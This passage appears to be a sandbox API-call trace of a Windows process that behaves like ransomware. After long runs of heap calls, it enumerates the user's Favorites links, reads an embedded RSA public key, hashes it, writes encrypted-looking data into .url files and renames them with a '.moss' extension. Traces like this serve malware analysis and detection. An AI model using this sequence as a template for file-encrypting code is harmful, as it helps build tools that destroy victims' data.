hHeap=0xcd0000) returned 1 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.292] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.293] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.293] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.295] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.295] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.295] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0171.295] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c430 [0171.295] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0171.295] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.295] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.295] PathFindFileNameW (pszPath="") returned="" [0171.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0171.295] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.296] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0171.296] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0171.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.297] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=236) returned 1 [0171.297] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.301] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.301] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.302] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xec, lpOverlapped=0x0) returned 1 [0171.303] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.303] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.303] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.303] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.303] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.304] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.304] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.304] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.304] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.304] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.304] GetLastError () returned 0x0 [0171.304] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.304] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.304] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.304] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.304] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.305] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.305] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.305] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.305] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.305] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.306] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.moss")) returned 1 [0171.308] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0171.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.308] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=226) returned 1 [0171.308] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.312] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.312] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.313] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.313] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xe2, lpOverlapped=0x0) returned 1 [0171.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.314] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.314] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.315] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.315] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.315] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.315] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.315] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.315] GetLastError () returned 0x0 [0171.315] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.315] 